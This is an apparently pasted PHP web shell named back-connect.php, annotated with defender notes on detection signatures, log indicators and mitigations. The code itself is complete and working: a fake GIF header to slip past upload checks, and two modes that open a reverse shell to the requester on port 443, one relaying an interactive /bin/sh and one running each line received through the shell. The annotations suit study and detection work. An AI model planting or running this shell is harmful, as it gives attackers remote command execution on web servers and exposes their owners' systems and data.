Avatar_Fearless

back-connect.php

Jun 28th, 2012
PHP 4.66 KB | None | 0 0
  1. GIF89;a
  2. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
  3. <HTML>
  4. <HEAD>
  5. <META http-equiv=Content-Type content="text/html; charset=windows-1254">
  6. </HEAD>
  7. <BODY>
  8. <CENTER>
  9. <?php
      // Defender note: this file is a PHP web shell offering two "back-connect" modes.
      // It opens with a "GIF89;a" line ahead of the DOCTYPE, which resembles a GIF magic
      // string; presumably it is there so a naive content check treats an uploaded copy
      // as an image. Validate uploads against an extension allow-list and make sure the
      // web server never executes PHP from upload directories.
      //
      // The two statements below write the host's php_uname() string into the page, so
      // anyone who can request this file learns the OS and kernel of the server.
  10. $uname = php_uname();
  11. echo "Uname -a :$uname";
  12. ?>
  13. <br><br>
  14. <a href="?BackConnect=PHP_1">PHP BackConnect 1</a>
  15. &nbsp;&nbsp; <a href="?BackConnect=PHP_2">PHP BackConnect 2</a>
  16. <?php
  17. function printit ($string) {
      // Status/error printer used by the PHP_1 branch: prints $string plus a newline
      // unless $daemon is truthy.
      // NOTE(review): $daemon is not imported with `global`, so inside this function it
      // is an undefined local and the condition below is always true. The messages are
      // therefore written to PHP's output regardless of the daemonise step, and their
      // literal texts (e.g. "ERROR: Can't spawn shell") can serve as content signatures
      // when scanning web roots or response bodies.
  18.    if (!$daemon) {
  19.       print "$string\n";
  20.    }
  21. }
  22. $bc = $_GET["BackConnect"];
      // Defender note: the mode is chosen by the "BackConnect" query parameter and no
      // access check is visible on this page before the switch. Requests carrying
      // "?BackConnect=PHP_1" or "?BackConnect=PHP_2" in web access logs are a direct
      // indicator that this file was triggered.
  23. switch($bc){
  24. case "PHP_1":
  25.  
      // Mode PHP_1: opens a TCP connection back to the requesting client and attaches
      // a shell process to it.
      // set_time_limit(0) lifts PHP's execution time limit, so the request can run
      // indefinitely; a PHP worker that never finishes is itself an anomaly to alert on.
  26. set_time_limit (0);
  27. $VERSION = "1.0";
      // The destination is the address of whoever made the HTTP request, on TCP 443.
      // Presumably 443 is used because outbound HTTPS is often permitted; egress rules
      // that stop the web server from initiating outbound connections block this.
  28. $ip = $_SERVER["REMOTE_ADDR"];
  29. $port = 443;    
      // Maximum number of bytes moved per fread() in the relay loop below.
  30. $chunk_size = 1400;
  31. $write_a = null;
  32. $error_a = null;
      // Command line handed to proc_open(): host/user enumeration followed by an
      // interactive /bin/sh. It runs with the privileges of the PHP process, so a
      // shell spawned as a child of the web server / PHP worker is a strong
      // process-tree detection signal.
  33. $shell = 'uname -a; w; id; /bin/sh -i';
  34. $daemon = 0;
  35. $debug = 0;
      // Only when the pcntl extension is present: fork, let the parent exit, and start
      // a new session in the child so the process is detached from the request.
  36. if (function_exists('pcntl_fork')) {
  37.    
  38.    $pid = pcntl_fork();
  39.    
  40.    if ($pid == -1) {
  41.       printit("ERROR: Can't fork");
  42.       exit(1);
  43.    }
  44.    
  45.    if ($pid) {
  46.       exit(0);  // Parent exits
  47.    }
  48.    if (posix_setsid() == -1) {
  49.       printit("Error: Can't setsid()");
  50.       exit(1);
  51.    }
  52.  
  53.    $daemon = 1;
  54. } else {
       // This warning text is emitted into the HTTP response and is another usable
       // content signature.
  55.    print("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  56. }
  57.  
  58. // Change to a safe directory
  59. chdir("/");
  60.  
  61. // Remove any umask we inherited
      // With umask(0), files created afterwards by this process or its children get
      // the most permissive mode the creating call asks for.
  62. umask(0);
  63.  
  64. //
  65. // Do the reverse shell...
  66. //
  67.  
  68. // Open reverse connection
      // fsockopen() is given a bare host and port (no ssl:// or tls:// prefix) with a
      // 30-second connect timeout, so the session is cleartext TCP. Non-TLS traffic on
      // port 443 originating from a web server is a network detection opportunity.
  69. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  70. if (!$sock) {
  71.    printit("$errstr ($errno)");
  72.    exit(1);
  73. }
  74.  
  75. // Spawn shell process
  76. $descriptorspec = array(
  77.    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
  78.    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
  79.    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
  80. );
  81.  
      // Mitigation: listing proc_open (and system, shell_exec, passthru, exec, popen)
      // in php.ini's disable_functions makes this call fail on hosts that do not need
      // to spawn processes from PHP.
  82. $process = proc_open($shell, $descriptorspec, $pipes);
  83.  
  84. if (!is_resource($process)) {
  85.    printit("ERROR: Can't spawn shell");
  86.    exit(1);
  87. }
  88.  
  89. // Set everything to non-blocking
  90. // Reason: Occasionally reads will block, even though stream_select tells us they won't
  91. stream_set_blocking($pipes[0], 0);
  92. stream_set_blocking($pipes[1], 0);
  93. stream_set_blocking($pipes[2], 0);
  94. stream_set_blocking($sock, 0);
  95.  
  96. printit("Successfully opened reverse shell to $ip:$port");
  97.  
      // Relay loop: copies bytes between the TCP socket and the child's
      // stdin/stdout/stderr pipes until either side reaches end-of-file.
  98. while (1) {
  99.    // Check for end of TCP connection
  100.    if (feof($sock)) {
  101.       printit("ERROR: Shell connection terminated");
  102.       break;
  103.    }
  104.  
  105.    // Check for end of STDOUT
  106.    if (feof($pipes[1])) {
  107.       printit("ERROR: Shell process terminated");
  108.       break;
  109.    }
  110.  
  111.    // Wait until a command is sent down $sock, or some
  112.    // command output is available on STDOUT or STDERR
         // The null timeout makes stream_select() block until a stream is readable;
         // on return $read_a holds only the streams that are ready.
  113.    $read_a = array($sock, $pipes[1], $pipes[2]);
  114.    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  115.  
  116.    // If we can read from the TCP socket, send
  117.    // data to process's STDIN
  118.    if (in_array($sock, $read_a)) {
  119.       if ($debug) printit("SOCK READ");
  120.       $input = fread($sock, $chunk_size);
  121.       if ($debug) printit("SOCK: $input");
  122.       fwrite($pipes[0], $input);
  123.    }
  124.  
  125.    // If we can read from the process's STDOUT
  126.    // send data down tcp connection
  127.    if (in_array($pipes[1], $read_a)) {
  128.       if ($debug) printit("STDOUT READ");
  129.       $input = fread($pipes[1], $chunk_size);
  130.       if ($debug) printit("STDOUT: $input");
  131.       fwrite($sock, $input);
  132.    }
  133.  
  134.    // If we can read from the process's STDERR
  135.    // send data down tcp connection
  136.    if (in_array($pipes[2], $read_a)) {
  137.       if ($debug) printit("STDERR READ");
  138.       $input = fread($pipes[2], $chunk_size);
  139.       if ($debug) printit("STDERR: $input");
  140.       fwrite($sock, $input);
  141.    }
  142. }
  143.  
       // Teardown: close the socket and the three pipes, then reap the child process.
  144. fclose($sock);
  145. fclose($pipes[0]);
  146. fclose($pipes[1]);
  147. fclose($pipes[2]);
  148. proc_close($process);
  149.  
  150. // Like print, but does nothing if we've daemonised ourself
  151. // (I can't figure out how to redirect STDOUT like a proper daemon)
       // NOTE(review): the two lines above appear to describe printit() and look
       // misplaced here; they do not document the break that follows.
  152. break;
  153. case "PHP_2":
       // Mode PHP_2: same destination (the requester's address, port 443), but each
       // line received on the socket is executed through the shell instead of being
       // piped into a long-lived /bin/sh.
  154.           $ipim=$_SERVER["REMOTE_ADDR"];
  155.          $portum="443";
  156.          if ($ipim <> "")
  157.          {
       // Plain TCP again (no transport prefix); no connect timeout is passed here.
  158.          $mucx=fsockopen($ipim , $portum , $errno, $errstr );
  159.          if (!$mucx){
       // $result is set on failure but is not printed anywhere on this page.
  160.                $result = "Error: didnt connect !!!";
  161.          }
  162.          else {
  163.          
  164.          $zamazing0="\n";
       // The banner string below is a fixed value and works as a network or file
       // content signature.
  165.          fputs ($mucx ,"\nwelcome ZoRBaCK\n\n");
       // system() writes the command's output to PHP's own output (the HTTP response)
       // and returns only the last line, so the socket receives that last line while
       // the response body also contains the uname/pwd/id results.
  166.          fputs($mucx , system("uname -a") .$zamazing0 );
  167.          fputs($mucx , system("pwd") .$zamazing0 );
  168.          fputs($mucx , system("id") .$zamazing0.$zamazing0 );
  169.          while(!feof($mucx)){  
       // NOTE(review): fputs() is called without a data argument here; PHP reports
       // that as a warning or error depending on version, which may show up in the
       // PHP error log.
  170.          fputs ($mucx);
  171.         $one="[$";
  172.         $two="]";
       // Reads up to 8192 bytes (one line) from the socket and runs it via the
       // backtick operator, which is shell execution of remote-supplied input. The
       // backtick operator stops working when shell_exec is listed in
       // disable_functions.
  173.         $result= fgets ($mucx, 8192);
  174.         $message=`$result`;
  175.        fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
  176.       }
  177.       fclose ($mucx);
  178.          }
  179.          }
  180.  
  181. break;
  182.  
  183. }
  184. ?>
  185. </CENTER>
  186. </BODY>
  187. </HTML>